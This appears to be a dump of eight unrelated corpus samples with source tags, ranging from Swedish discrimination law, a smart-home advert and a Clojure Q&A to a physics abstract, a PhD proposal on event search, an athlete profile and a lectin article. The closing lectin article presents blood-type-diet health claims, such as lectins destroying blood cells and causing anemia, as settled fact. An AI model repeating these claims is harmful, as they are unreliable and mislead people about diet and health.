Diskrimineringslagen förbjuder diskriminering utifrån kön, könsöverskridande identitet eller uttryck, etnisk tillhörighet, religion eller annan trosuppfattning, funktionsnedsättning, sexuell läggning och ålder. Det kan vara direkt diskriminering, att någon missgynnas genom att hen behandlas sämre än andra i en jämförbar situation, eller indirekt diskriminering, att någon missgynnas genom tillämpningen av en bestämmelse, ett kriterium eller ett förfaringssätt. Diskriminering kan också ske genom trakasserier, alltså ett uppträdande som kränker någons värdighet och som har samband med diskrimineringsgrunderna. Sexuella trakasserier är ett uppträdande av sexuell natur som kränker någons värdighet.
Arbetsgivare och utbildningsanordnare är skyldiga att arbeta med förebyggande och främjande för att motverka diskriminering och på annat sätt verka för lika rättigheter och möjligheter.
Källor: diskrimineringslagen, regeringsformen och tryckfrihetsförordningen
|
{
"pile_set_name": "OpenWebText2"
}
|
HOW TO GET YOUR SMART HOME READY FOR CHRISTMAS
HAVE A SAFE, SMART CHRISTMAS!
Spread Christmas Cheer with Z-Wave Devices
The weather is crisp, the stores are playing holiday tunes, and the smell of gingerbread and pine needles is in the air—it’s Christmas time! Whether you’re a fan of DIY smart home automation or have a professional system, one thing is definitely clear: having smart home devices makes the holidays much more enjoyable and effortless. Below, we cover our favorite ideas for putting your smart Z-Wave devices to work for the Christmas season.
The Décor
While your smart home system can’t put up the lights, wreath, and stockings for you, it can help manage the energy usage and on/off times for all your electric décor. Here’s how:
Start with a Smart Power Plug:Instead of plugging the Christmas lights directly into an outlet, connect it to aZ-Wave plug. The smart power plug takes whatever is connected to it and makes it controllable by your smart hub or professional system. So right from your phone, you can turn the décor off or on.
Automate It:As nice as it is to be able to turn the Christmas lights on or off from your phone, it’s even better to have a completely hands-off approach. The two most common ways to do this are with timers and motion sensors. Using your same Z-Wave plug, you can set up the holiday décor to turn off and on at certain times throughout the day so that you don’t accidentally leave the outdoor decorations or Christmas tree on all night long.Smart motion sensors let you save even more energy by only turning on the interior decorations when there’s somebody there to enjoy them.
The Activities
Whether you’re planning a big holiday party or just spending time with family, you can use your smart home devices for a variety of fun Christmas activities. For example, if you have a Z-Wave alarm siren that chirps whenever motion is detected at night, use it to your advantage on Christmas Eve. Read a Christmas story with the kids upstairs while another family member moves around downstairs to trigger the motion sensors. The chirp of the smart alarm will get the kids all excited knowing that Santa is setting out the presents.
The Security
There is a significant boost in burglaries during the holiday season. Homes are left unoccupied while the residents travel to visit family, creating a perfect opportunity for thieves to help themselves to your valuables. If your Christmas plans include traveling away from home, make sure you’re not leaving your property defenseless. Check out our for tips on ensuring your property is safe without breaking the bank.
Of course, it’s not always thieves that you need to worry about when you’re leaving your home unattended. In the winter months, one broken pipe can spell disaster. If you want to avoid water damage, consider a water leak prevention system. Simply place water leak sensors and a water main shut-off valve (you can install it yourself with just a screwdriver) in your home. If a pipe bursts, the water heater leaks, or the tub overflows, the smart leak prevention system will automatically shut off the water to prevent the leak from spreading.
Want to give yourself the gift of comfort, security, and convenience this Christmas? Head over to our smart home devices store today and shop to your heart’s content! To keep up with the latest Z-Wave product news, follow us on Twitter and Facebook.
|
{
"pile_set_name": "Pile-CC"
}
|
Q:
binding & pmap interaction change?
There are several somewhat old blog posts out there advising caution when mixing dynamic variables, binding, and pmap, e.g. here, where we get the following code snippet:
user=> (def *foo* 5)
#'user/*foo*
user=> (defn adder
[param]
(+ *foo* param))
#'user/adder
user=> (binding [*foo* 10]
(doseq [v (pmap adder (repeat 3 5))]
(println v)))
10
10
10
nil
But that's not what happens when I run that code (changing the first line to (def ^:dynamic *foo* 5)). I get three 15s as output (using Clojure 1.4), just as you would naïvely expect—that is, with the change in the binding form seen by the function passed to pmap. Have the way thread-local bindings and pmap interact changed? I can't find this documented anywhere.
A:
starting in 1.3 the set of local bindings are sent to pmap along with the function. So as long as you mark the var ^:dynamic this is no longer a problem. This feature it called Binding Conveyance and is included in the 1.3 changelog:
from: https://github.com/clojure/clojure/blob/1.3.x/changes.txt
Clojure APIs that pass work off to other threads (e.g. send, send-off, pmap, future) now convey the dynamic bindings of the calling thread:
(def ^:dynamic *num* 1)
(binding [*num* 2] (future (println *num*)))
;; prints "2", not "1"
|
{
"pile_set_name": "StackExchange"
}
|
Snowballs By Fliss Chester AudioBook Download
Snowballs By Fliss Chester AudioBook Download
Snowballs AudioBook Summary
Join old university friends Jenna, Max, Angus, Bertie, Hugo and Sally as they set off for a wintry week of fun, fondue and frivolity on the glamorous Val d’Argent.
On the agenda: flirting, drinking, dancing – and a bit of skiing along the way. But once they arrive, they are soon waylaid by secret passions, ominous oligarchs, chairlift shenanigans and the sort of social climbing that requires more effort and planning than a solo ascent of Mont Blanc.
Clip on your skis, dig out your salopettes and get ready for some fun on the slopes….
|
{
"pile_set_name": "Pile-CC"
}
|
Spectroscopic properties and location of the Tb(3+) and Eu(3+) energy levels in Y2O2S under high hydrostatic pressure.
In this contribution, an extensive spectroscopic study of Y2O2S doped with Eu(3+) and Tb(3+) is presented. Steady-state luminescence and luminescence excitation spectra as well as the time-resolved spectra and luminescence kinetics were obtained at high hydrostatic pressures up to 240 kbar. It was found that pressure quenches the luminescence from the (5)D3 excited state of Tb(3+) and recovers additional luminescence related to transitions from the (5)D3 state of Eu(3+). These effects are related to the pressure-induced increases in the energies of the ground electronic manifold 4f(n) of Eu(3+) and Tb(3+) ions with respect to the band edges. Analysis of the emission and excitation spectra allowed the estimation of the energies of the ground states of all lanthanide (Ln) ions (Ln(3+) and Ln(2+)) with respect to the valence and conduction bands edges of the Y2O2S host. The bandgap energy and difference between energies of the ground states of Ln(2+) and Ln(3+) have been calculated as functions of pressure. The experimental high-pressure spectroscopy results allow the calculation of the absolute values (calculated with respect to the vacuum level) of the energies and pressure-induced shifts of the conduction and valence band edges and the ground states of Ln(3+) and Ln(2+) ions in Y2O2S.
|
{
"pile_set_name": "PubMed Abstracts"
}
|
---
abstract: 'In this article, I present the questions that I seek to answer in my PhD research. I posit to analyze natural language text with the help of semantic annotations and mine important events for navigating large text corpora. Semantic annotations such as named entities, geographic locations, and temporal expressions can help us mine events from the given corpora. These events thus provide us with useful means to discover the locked knowledge in them. I pose three problems that can help unlock this knowledge vault in semantically annotated text corpora: *i.* identifying important events; *ii.* semantic search; and *iii.* event analytics.'
author:
- |
Dhruv Gupta\
\
\
subtitle: 'Detecting Events in Semantically Annotated Corpora for Search & Analytics'
title: Event Search and Analytics
---
Introduction
============
Information retrieval systems have largely relied on word statistics in text corpora to satisfy information needs of users by retrieving documents with high relevance for a given keyword query. In my PhD research I hypothesize that information needs of users can be satisfied to a greater extent by using *events* as a means of navigating text corpora. Events in our context would be an act performed by certain actor(s) at a specific location during a specific time interval. An example would be : *Usain Bolt won the gold medal at the 2008 summer Olympics in Bejing*. With the availability of annotators that can provide us with accurate semantic annotations in form of named entities, geographic locations, and temporal expressions; we can leverage the growing number of knowledge resources such as Wikipedia [@wiki] and ontologies such as Freebase [@freebase] to understand natural language text and mine important events. Formally the central hypothesis can be stated as follows:
As a toy example consider the following text snippet [^1] with demonstrative semantic annotations in Figure \[fig:text\] :
In the text snippet (Figure \[fig:text\]), we obtain the named entity whose mention has been identified and disambiguated to point to an external knowledge source. Also identified is a geographical location - , which is disambiguated and resolved to its geographical coordinates. Likewise the temporal expression has also been resolved to time range. Having these semantic annotations we can now devise algorithms that can deduce that the event is that of Usain Bolt winning Olympic competition in Beijing, China.
The goal of the proposed research is to leverage the semantic annotations for mining important events and use them to navigate text corpora. The research will find application in many domains of research such as *digital humanities*, in which social scientists are interested in computational history in large digital-born text collections. Anthropologists are interested in cultural and linguistic shifts that occur in such collections. Collectively we can allow *computational culturomics* [@culturomics] on corpora to study cultural trends. Events can also be used to link information in multiple and diverse text collections. In short, important events provide a way to create a gist from semantically annotated corpora, which otherwise is not possible through manual human effort.
**Outline**. The article consists of:
- a literature survey (Section \[sec:background\]);
- an overview of the research problems (Section \[sec:problem\]);
- available corpora, test sources and evaluation measures for research (Section \[sec:evaluation\]);
- discussion of few open technical problems (Section \[sec:discussion\]).
Related Work
============
\[sec:background\]
In this section I discuss the progress already made in the area of analyzing different semantic annotations in isolation as well as in conjunction for some of the problems proposed.
**Temporal Information Retrieval and Extraction**. Researchers have considered only temporal annotations in text corpora to improve retrieval effectiveness by analyzing the time sensitivity of keyword queries and incorporating the time dimension in retrieval models. Some methods of analysis of time-sensitive queries rely on publication dates of documents [@diaz_profile; @nattiya_2010], while others also look at the temporal expressions in document contents [@dhruv_2014]. Several works also take into account the time dimension for re-ranking documents [@klaus_2010] and diversifying them along time [@klaus_2013; @nattiya_2014]. One of the seminal works in extracting temporal events was by Ling and Weld [@ling_tie]. They outline a probabilistic model to solve the problem of extracting relations from text with temporal constraints.
**Important Events in Annotated Corpora**. One of the most important seminal works in identifying existing and emerging events were the various tasks in *Topic Detection and Tracking* (TDT) [@tdt_book]. The TDT program aimed to “search, organize and structure” broadcast news media from multiple sources. The five tasks laid within the ambit of TDT where topic tracking, link detection, topic detection, first story detection, and story segmentation. The task of topic tracking required to build a system to detect *on topic stories* from an evaluation corpus after being trained on a set *on topic* stories. The link detection task involved answering a boolean query to whether two given *stories* are related by a common topic. The topic detection task comprised of declaring new *topics* from incoming *stories* which had not been presented to the system. First story detection was another boolean decision task of determining whether the given *story* is a seed story (first-story) to create a new *topic* cluster. Story segmentation task required segmentation of an incoming stream of text into *stories*.
Focusing specifically on extracting and summarizing events in the future, Jatowt and Yeung [@adam_cikm11] present a model-based clustering algorithm. The clustering considers both textual and temporal similarities. For computing temporal similarity, the authors model time as a probability distribution by utilizing different family of distributions based on whether its is singular time point, starting date or and ending date. The similarity is then computed using KL-divergence.
Radinsky et al. [@kira_jair] present an algorithm *Pundit*, which based on the past events in text is able to predict a future event given a query to the system. The events are represented as multidimensional attributes such as time, geographic location and participating entities. The algorithm derives these events from external text collection and builds an *abstraction tree*, which is the result from hierarchical agglomerative clustering. In order to predict the future *Pundit* is trained to select the most similar cluster from the *abstraction tree* and produce an event representation.
The work by Yeung and Jatowt [@yeung_cikm11] tackles the problem of analysis of historical events in multiple large document collections. They utilize *latent Dirichlet allocation* to identify *topic* distributions along time. Thereafter they perform analytics to answer questions such as *i.* significant years and topics, *ii.* triggers that caused remembrance of the past and *iii.* historical similarity of countries.
Most recently, Abujabal and Berberich [@mppf] present a system which identifies important events in text collections by counting frequent itemsets of sentences containing named entities and temporal expressions. For evaluation they resort to *Wikipedia’s* event directory as a ground truth.
**Semantic Search**. Summarizing text collections in a timeline visualization is a natural choice. Swan and Allan [@swan_timeline] present an approach for producing a timeline that depicts most important topics and events closely modeled on the *Topic Detection and Tracking* task. The algorithms analyzes features based on named entities and noun phrases. The analysis involves construction of $2 \times 2$ contingency table on presence or absence of features, and subsequent measurement of $\chi^2$ statistic for measuring significance of co-occurrence of a pair of features.
The seminal work by Baeza-Yates [@yates_future] proposed a *future retrieval* (FR) system. The FR system considers both text and temporal expressions to identify future events that might be relevant to an input query. Baeza-Yates outlined the components of a FR system to be composed of an *information extraction* (IE) module, *information retrieval* (IR) module, and a *text mining* (TM) module. The IE module would act as a temporal annotator; identify temporal expressions and normalize them. The IR system is designed to incorporate the time dimension in an index; thus retrieving documents with text and time similarity. The TM module would identify the most relevant topics given a time period. He presented a retrieval model, in which each document consists of a multiple temporal events. A temporal event consists of a time segment and its associated likelihood of occurring. The score of the document is thus obtained by its textual similarity and the maximum likelihood of all the temporal events in that document.
Bast and Buchhold [@bast_index] outline a joint index structure over ontologies and text. Which allows for fast semantic search and provide context sensitive auto-complete suggestions.
Events as a means of search document collections has also been explored by Strötgen and Gertz [@jannik_event]. Events were modeled by the geographic location and time of their occurrence. For temporal queries expressed in simple natural language they outline an extended Backus-Naur form (EBNF) language that incorporates time intervals with standard boolean operations. Geographical queries are also modeled as EBNF language, however the input for them is a minimum bounding rectangle (MBR). Using this multidimensional querying model the user is able to visualize search results in form of events; which are additionally represented on a map.
Giving special attention to geographical information retrieval, Samet et al. [@samet_news] present a system *NewsStand*, that is able to resolve and pinpoint a news article based on the geographic information present in its content. They discuss various methods for toponymn resolution, which is in essence disambiguating the geographic location based on its surface form in the news content. The system involves a streaming clustering algorithm that can keep track of emerging news in new locations and present them in a map-based interface.
[l|p[4cm]{}p[4cm]{}p[4cm]{}]{}
\
**Event** & $c_1$ & $c_2$ & $c_3$\
**Words** & micheal, phelps, bejing, china, tibet & london, usain, bolt, england, badminton & rio, brazil,copacabana, deodoro, maracanã\
**Time** &$[08-08-2008, 24-08-2008]$ & $[27-07-2012, 12-08-2012]$ & $[05-08-2016, 21-08-2016]$\
**Location** & $\langle Beijing, China \rangle$ & $\langle London, England \rangle$ & $\langle Rio de Janeiro, Brazil \rangle$\
**Entities** & $\langle China \rangle$, $\langle Micheal\_Phelps \rangle$ & $\langle England \rangle$, $\langle Badminton \rangle$ & $\langle Brazil \rangle$, $\langle Copacabana \rangle$\
**Event Analytics**. By disambiguating and linking named entities to ontologies, Hoffart et al. [@aesthetics; @stics] provide a framework for semantic search and performing analytics on them. They provide features for giving auto-complete suggestions in the form of similar entities for the input named-entity. In [@aesthetics] they provide analytics that leverage accurate entity counts and provide entity co-occurrence statistics which is helpful in analyzing semantically similar named-entities.
Research Objectives
===================
\[sec:problem\] Given the text corpora with semantic annotations, I describe three important research problems in this section: *i.* identifying important events; *ii.* using identified events for improving retrieval effectiveness; and *iii.* using identified events for analytics.
Notation
--------
Let us consider multiple corpora for the purpose of analysis. This allows us to capture frequently occurring events as well as link similar events across corpus. Given corpora $$D = \bigcup_{k=1}^{N} D_k,$$ where each document $d \in D$ consists of word sequence $x$ at appropriate granularity (e.g. paragraph or sentence): $$d = \bigcup_{i=1}^{n} x_i.$$ Further each $x \in d$ contains semantic annotations in form of *i.* named entities ($e$), *ii.* geographical location ($g$), and *iii.* temporal expressions ($t$). Additionally $x$ also consists of the a bag of words $\mathcal{W}$ drawn from a vocabulary $\mathcal{V}$. Formally represented as: $$x = \langle \mathcal{E}, g, t, \mathcal{W} \rangle$$
Problem Definition
------------------
The objective is to design a family of algorithms: $$\textsc{Event*}(X,Q,\alpha)$$
where $X = \bigcup x$, $Q$ represents an input query and $\alpha \in \mathds{R}^m$, where $\alpha$ is set of parameters.
The input query $Q$ can be a combination of following input components: *i.* keyword query $q$, *ii.* time $q_{time}$, *iii.* geographical location $q_{geo}$, and *iv.* named entity $q_{entity}$.
Given the input, we need to design the algorithms $\textsc{Event*}$ according to the different problems. We discuss the design objectives for the three different purposes in this section.
**Identifying Important Events**. *Events* are the proposed building blocks for further text analysis. An *event* in our context is defined to be an activity or an act involving named entities that happens in a specific geographical location anchored to a specific time interval. Mathematically, given a multidimensional query : $$Q = \langle q, q_{time}, q_{geo}, g_{entity} \rangle,$$ and a subset of highly relevant documents $R \subseteq D$, the algorithm for this purpose $\textsc{EventDetect}$ should produce a set of ordered events : $$\mathcal{C} = \{ c_1, c_2, \ldots, c_k \},$$
where, $c = \langle \mathcal{E}, g, t, \mathcal{W} \rangle$. The event $c$ is hence described by the participating named entities $\mathcal{E}$, its location $g$, its time of occurrence $t$, and frequently occurring contextual terms around these semantic annotations $\mathcal{W}$. This requires proposing a probability mass function, $P(\mathcal{C}, R)$, using which we can impose a total order on $\mathcal{C}$.
As an example consider the keyword-only query `summer olympics` to the processed corpora of news articles. The designed algorithm shall then identify the important events as in Figure \[fig:event\].
**Diversifying and Summarizing Search Results** are retrieval tasks that try to address the information need underlying an ambiguous query at different levels of textual granularity. Each task tries to maximize the coverage of different information needs underlying the given ambiguous query. As information intents, we propose to use the mined set of *events*. Accomplishing these tasks would allow for automatic creation of *event timelines* or *entity biographies*. We briefly discuss an intuition of achieving the same.
When diversifying search results we would like to present users with *documents* such that the user finds *at least* one document that satisfies her information intent. For this we need to devise an algorithm $\textsc{EventDiverse}$ which considers as an input $Q$ and $R \subseteq D$. As an output it returns a set of documents $S \subset R$ which cover all events in $\mathcal{C}$.
Summarizing search results would require us to construct an algorithm $\textsc{EventSummary}$ to piece together, *sentences* $\hat{S} = \bigcup x$, such that the text summary covers all events in $\mathcal{C}$.
**Semantic Search and Analytics**. The mined set of *events* can further be utilized for search and analytics. For this purpose we can utilize inherent hierarchy in the semantic annotations. For example a given year can be broken down to different months and subsequently days in those months. Similarly, we can utilize the *type hierarchies* in named entities. Such as and are subtypes of . This can jointly be modeled by using the concept of a *data cube* [@han_dm] as shown in Figure \[fig:data\_cube\].
Formally, given a query $Q$, the objective would to first model the mined set of events as a *data cube* and subsequently provide *data cube operations* [@han_dm]:
- roll ($\bigcirc$),
- slice ($\ominus$),
- dice ($\oplus$),
- drill up ($\bigtriangleup$),
- drill down ($\bigtriangledown$).
![Example data cube based on set of events $\mathcal{C}$[]{data-label="fig:data_cube"}](cube.pdf)
![Example data cube operations for the query `all races won during 2008 by usain bolt in china` []{data-label="fig:cube_opr"}](cubeopr.pdf)
As a concrete example consider the query `all races won during 2008 by usain bolt in china`. To produce an appropriate result the sequence of operations would be: first a slice on the entity ; second dice on ; and finally drill up to year (see Figure \[fig:cube\_opr\]).
Data
====
**Corpora**. There are several readily available massive data sets. They are available from news corporation such as the *New York Times* [@nyt], *English Gigaword* [@gigaword]. These corpora have the benefit of being available with reliable publication dates and grammatically well-formed text. On larger scale are Web collections such as *ClueWeb’09* [@clueweb09]/’12 [@clueweb12], which are not always accompanied by reliable creation dates and many are ill-formed documents.
**Semantic Annotations**. The text corpora next need to be annotated for text mining. I explain how to obtain the different semantic annotations in the following paragraphs.
**Named Entities**. For disambiguating and linking named entities in text to an external knowledge source such as *Wikipedia* [@wiki] or an ontology such as YAGO [@yago] or Freebase [@freebase]; I use the AIDA system [@aida]. The AIDA system does named entity disambiguation and linking by leveraging contexts extracted from ontologies such as YAGO. For Web collections such ClueWeb’09/’12 the entity disambiguation and linking has been released as *facc1 : Freebase annotation of ClueWeb Corpora* [@facc].
**Geographical Locations** can be obtained by utilizing *geographic* named entities such as those known to be cities, countries, or continents. Geographical relations stored in an ontology can be used to resolve these locations to its geographical coordinates. Having obtained a set of coordinates, we can subsequently construct a geographical representation such as a *minimum bounding rectangle* over the coordinates.
**Temporal Expressions**, both implicit and explicit, can be extracted and normalized from text by using *temporal taggers* such as HeidelTime [@heideltime] or SUTime [@sutime].
Evaluation
==========
\[sec:evaluation\]
To test our approach we need to construct query sets that contain an event description associated with the query; along with participating named entities, geographical locations where the event took place and relevant time interval associated with it. I describe a tentative approach to achieve this here.
**Test Data**. To evaluate the correctness of the various algorithms, I plan to use reliable encyclopedic resources on the Web such as *Wikipedia* [@wiki] or other curated knowledge sources. For an objective evaluation, I propose the following different sources depending on the algorithm under evaluation.
- Identify important events
- Events in a particular year/decade etc. pages available on *Wikipedia* [@wiki_year].
- Testing of past events can be done by extracting important topics from *Category* pages on various historical topics on *Wikipedia* [@wiki_past].
- Events in the future can be evaluated by using important infrastructure projects, engineering projects etc. These can be extracted from *Wikipedia* and other sources on the Internet.
- Current events extracted from *Wikipedia* [@wiki_current].
- Alternatively, we can manually construct a list of prominent events and extract relevant information such as named entities, geographical location, and time from ontologies such as: YAGO [@yago], Freebase [@freebase], etc.
- Diversifying and summarizing search events
- Biographies of eminent personalities, for example United States presidents [@wiki_potus].
- Historical timelines of various countries, for example for India [@wiki_timeline].
**Structure**. Each event in our test bed is then composed of a fact with an accompanying query. Formally, a *fact* in our testbed is a 4-tuple extracted from one of the aforementioned sources: $$\langle q,\mathcal{E}, g, t, \mathcal{W} \rangle$$
where $q$ consists of keyword query describing the event, $\mathcal{E}$ is a bag of participating entities, $g$ is the geographic location, $t$ is the time of its occurrence, and $\mathcal{W}$ are important terms describing the event.
**Metrics**. Based on the structure of the testbed of events, metrics such as *precision*, *recall* and *F$_1$* can be utilized to measure the effectiveness of the algorithms for detecting important events in semantically annotated corpora. How effectively the algorithm diversifies documents along multiple dimensions can be evaluated by metrics such as $\alpha$-nDCG [@diverse]. Quality of summaries can be measured by an automatic evaluation metric called *Rouge* [@rouge].
Discussion
==========
\[sec:discussion\]
I briefly present some open technical challenges that I will address along with the research objectives in my PhD dissertation.
**Mathematical Models**. One key aspect that occurs in the design of the algorithms is that of computational models for named entities, geographical locations and temporal expressions. What would be the most descriptive mathematical models for each of these semantic annotations?
**Similarity Functions**. Given a pair of named entities, geographical locations or temporal expressions; how can we efficiently compute the similarity between the same type of annotations?
**Efficiency & Scalability**. Identifying data structures for indexing corpora along with their semantic annotations, such that their asymptotic run times scale linearly with the size of the corpora.
**Evaluation**. Since evaluation of the solutions outlined are very subjective in nature; what are other reliable sources of objective ground truth ? What other metrics can be employed to test the effectiveness of our methods ?
Conclusion
==========
\[sec:conclusion\]
In this article I laid out an outline of the research work that I envisage to carry out for my PhD dissertation. The research would in its culmination provide us methods to computationally extract world history as sequence of temporally ordered events and portray future events to take place from semantically annotated corpora. The research would also provide ways to perform semantic search and large scale event analytics on these annotated corpora. I further described already available resources that can be utilized for carrying out the research; test cases that can be built from encyclopedic resources on the Internet; and the metrics that can be utilized for evaluation.
[10]{} Clueweb’09. <http://www.lemurproject.org/clueweb09.php/>.
Clueweb’12. <http://www.lemurproject.org/clueweb12.php/>.
English gigaword. <https://catalog.ldc.upenn.edu/LDC2003T05>.
New york times anotated corpus. <https://catalog.ldc.upenn.edu/LDC2008T19>.
Abujabal A. and Berberich K. Important events in the past, present, and future. WWW’15 Companion Volume.
Agrawal R. et al. Diversifying search results. WSDM’09.
Allan J., editor. . Kluwer Academic Publishers, Norwell, MA, USA, 2002.
Baeza-Yates R. Searching the future. SIGIR’05 Workshop MF/IR.
Bast H. and Buchhold B. An index for efficient semantic full-text search. CIKM’13.
Berberich K. et al. A language modeling approach for temporal information needs. ECIR’10.
Berberich K. and Bedathur S. Temporal diversification of search results. TAIA’13.
Bollacker K. et al. Freebase: A collaboratively created graph database for structuring human knowledge. SIGMOD’08.
Chang A. X. and Manning C. D. : A library for recognizing and normalizing time expressions. LREC’12.
Ringgaard M. et al. Facc1: Freebase annotation of clueweb corpora, version 1 (release date 2013-06-26, format version 1, correction level 0), June 2013. <http://lemurproject.org/clueweb12/>.
Gupta D. and Berberich K. Temporal query classification at different granularities. SPIRE’15.
Han J. et al. . Morgan Kaufmann Publishers Inc., San Francisco, CA, USA, 3rd edition, 2011.
Hoffart J. et al. analytics with strings, things, and cats. CIKM’14.
Hoffart J. et al. searching with strings, things, and cats. SIGIR’14.
Hoffart J. et al. Robust disambiguation of named entities in text. EMNLP’11.
Jatowt A. and Yeung C. A. Extracting collective expectations about the future from large text collections. CIKM’11.
Jones R. and Diaz F. Temporal profiles of queries. , 25(3), July 2007.
Kanhabua N. and N[ø]{}rv[å]{}g K. Determining time of queries for re-ranking search results. ECDL’10.
Ling X. and Weld D. S. Temporal information extraction. AAAI’10.
Michel J. B. et al. Quantitative analysis of culture using millions of digitized books. Science’10.
Nguyen T. N. and Kanhabua N. Leveraging dynamic query subtopics for time-aware search result diversification. ECIR’14.
Radinsky K. et al. Learning to predict from textual data. , 45:641–684, 2012.
Samet H. et al. Reading news with maps by exploiting spatial synonyms. , 57(10):64–77, 2014.
Str[ö]{}tgen J. and Gertz M. Event-centric search and exploration in document collections. JCDL’12.
Strötgen J. and Gertz M. Multilingual and cross-domain temporal tagging. , 47(2):269–298, 2013.
Suchanek F. M. et al. Yago: A large ontology from wikipedia and wordnet. , 6(3):203–217, September 2008.
Swan R. C. and Allan J. Automatic generation of overview timelines. SIGIR’00.
Wikipedia. List of presidents of the united states — [W]{}ikipedia[,]{} the free encyclopedia, 2015. <https://en.wikipedia.org/wiki/List_of_Presidents_of_the_United_States>.
Wikipedia. List of years — [W]{}ikipedia[,]{} the free encyclopedia, 2015. <https://en.wikipedia.org/wiki/List_of_years>.
Wikipedia. List of years in india — [W]{}ikipedia[,]{} the free encyclopedia, 2015. <https://en.wikipedia.org/wiki/List_of_years_in_India>.
Wikipedia. Portal:contents/history and events — [W]{}ikipedia[,]{} the free encyclopedia, 2015. <https://en.wikipedia.org/wiki/Portal:Contents/History_and_events>.
Wikipedia. Portal:current\_events — [W]{}ikipedia[,]{} the free encyclopedia, 2015. <https://en.wikipedia.org/wiki/Portal:Contents/History_and_events>.
Wikipedia. ikipedia[,]{} the free encyclopedia, 2015. <http://en.wikipedia.org/>.
Yeung C. A. and Jatowt A. Studying how the past is remembered: towards computational history through large scale text mining. CIKM’11.
Lin C. Y. Rouge: a package for automatic evaluation of summaries. ACL-04 workshop.
[^1]: <http://www.bbc.com/sport/0/athletics/34032366>
|
{
"pile_set_name": "ArXiv"
}
|
Monday, June 20, 2016 1:43:00 PM America/New_York
Gold Medalist at both Pan-Pacific and Pan-American Games in the 200 m backstroke.
Dede Griesbauer is an INFINIT athlete out of Boulder, CO. Dede grew up a competitive swimmer, setting multiple National records for her high school. She went on to compete at Stanford University and continued to succeed. She won 10 NCAA All-American awards and captained the team for the 1992 season, during which she led the team to a National Championship title. From 1989-1994, Dede was also a member of the US National Swim team, during which time, she, earned gold at both the Pan-Pacific and Pan-American Games and competed at two U.S. Olympic trials.
In 1994, Dede decided to retire from swimming to enter graduate school at the Wharton School at the University of Pennsylania. She went on to pursue a financial career on Wall Street. While balancing both career and sport in 2004, Dede competed as an amateur and was able to take first place in every one of her “in season” races. Unfortunately, at the Ironman World Championships an Achilles injury kept her off the podium.
After eight years as an equity trader, Dede had worked her way up to Vice President of an investment firm, but in 2005, she decided to step away from her investment career and return to a career as an athlete.
In 2006, Dede got her first major victory during only her second year as a pro. She took first place at Ironman UK, setting a new course record, and started gaining attention from sponsors and the rest of the racing community.
Since 2007, Dede has been working with INFINIT Nutrition, using a custom formula on the bike, and INFINIT’s Napalm for the run...
“I can’t take credit here. INFINIT Founder and CEO, Michael Folan created my formula for me! In a brief phone conversation, where we discussed some of my nutritional short comings in Ironman races (for me, it was bloating, while simultaneously bonking at mile 16 of the marathon in an Ironman), Michael created a formula for me, all the way back in 2007. To this day, minus some tinkering with flavor options, and adding caffeine I haven’t touched the formula one bit.”
"The right number of calories per hour in the right mixture of carbs, a flavor that I love, and a kick of caffeine that I use in the second half of the bike. I adjust my electrolyte slider based on race conditions. It's just that easy..."
*Free shipping at $125 valid for Contiguous United States addresses only, not valid on wholesale or international orders.**Try INFINIT for Free 5 Hour Challenge Sample Pack is valued as "FREE" based on the total value of all items included which offsets cost of the product trial
|
{
"pile_set_name": "Pile-CC"
}
|
All living things manufacture sugars on their surfaces, and sometimes these sugars are also secreted in free form as a type of protective coating. Good examples of these free sugars are the algae slimes found on top of stagnant water and our own mucus secretions. Among the tens of thousands of different complex sugars produced by the cell for use in signaling and recognition is one that determines ABO blood group.
Like the other surface sugars, blood group antigens telescope out from the cell wall, and are found principally in the blood stream and digestive tract. While they are attached to the cell wall, they are not fixed in place. Rather, they move around the cell’s surface. Sticking out the way they do, in a world of things reacting with one blood group or another, it would seem inevitable that they would get tangled up with things. Most of the time these are agglutination-type reactions.
Living things manufacture agglutinins in a great variety of shapes and forms, and they don’t share any real characteristics other than the ability to clump sugars together.
Lectins
Lectins are similar to a selective Velcro, a powerful way for organisms in nature to attach themselves to other organisms in nature. This natural Velcro comes in two varieties, one-sided and two-sided. The one-sided variety just gets stuck on things. Lots of germs, and even our own immune systems, use the one-sided variety all the time. Cells in the bile ducts of the liver have lectins on their surfaces to help them snatch up bacteria and parasites. Bacteria and other microbes have lectins on their surfaces that work rather like suction cups so that they can attach to the slippery mucus linings of the body. Sometimes the lectins that viruses or bacteria use can be blood group specific, making the microbe a stickier pest for a person of the favored blood group.
Two-sided lectins stick other cells together, like two tennis balls stuck together by a piece of two-sided Velcro. Think of the fuzz on the tennis ball as the assortment of sugars (including one that determines blood group) that line the surface of the cell.
The degree that lectins stick to cells is mostly determined by the amount of glycoconjugates (or degree of glycosylation) that a particular tissue has. The cells lining the small intestine wall, for example, are typically very glycosylated, and thus less able to bind lectins. Yet it is not just the amount of glycoconjugates that determines the reactivity of dietary lectins. Remember that lectins are very choosy about what they deign to attach to, and their criteria are highly individualized.
Factors influencing glycosylation in the intestines, and hence the activity of dietary lectins, include age, health and blood type, among others.
Lectins and Their Species
Lectins are always specific to the species from which they are derived. For example, the lectin found in wheat is different from the lectin found in soy, it has a different shape and it attaches to a different combination of sugars. Lectins are most widely distributed in plants. Particularly abundant in legumes, they account for between 2% and 3% of the total protein content of soybeans, lentils, and peanuts. The second most common source of lectins is seafood, particularly eel, shellfish, snails, halibut, and flounder.
Because they are commonly found in grains, seafood, legumes, and vegetables, lectins are widely abundant in the typical diet. Even tiny amounts of a lectin will suffice to clump huge numbers of cells.
Although many lectins are destroyed by normal cooking, many are not. The lectin found in wheat germ will resist heating 100°C (212°F) for 30 minutes. Other food lectins known to resist destruction by cooking include apples, carrots, wheat brans, canned corns, pumpkin seeds, bananas, and wheat flour. The clumping abilities of bananas agglutinin are actually enhanced by heating. Researchers have also noted high levels of lectin activity in dry roasted peanuts, and certain processed breakfast cereals. Lectins from kidney beans can resist mild cooking and retain their activity, even at 90°C (194°F) for 3 hours. Presoaking the beans, however, results in complete loss of lectin activity.
Many lectin-containing foods evade cooking because they are normally eaten raw, such as tomatoes, now the primary vegetable source of vitamins and minerals in the U.S. diet. Unlike most lectins, which usually react with only one blood group or another, tomato lectin is a panagglutinin; it is able to attach itself with equal ease to the cells of all blood groups. The average American consumes around 200 milligrams of lectins per year from tomatoes alone, and many other salad ingredients are rich in lectins.
Studies show that up to 5% of the ingested dietary lectins are absorbed into the bloodstream. There they can clump and bind to red and white blood cells, destroying them. It has been proposed that much of the low-grade anemia seen in Third World countries may be caused by the destruction of red blood cells from lectin-rich grain and bean diets. However, the actions of food lectins on the digestive tract are probably much more potent. Here they can cause inflammation of the mucus linings, and mimic many of the symptoms of food allergies.
Lectins and Blood Groups
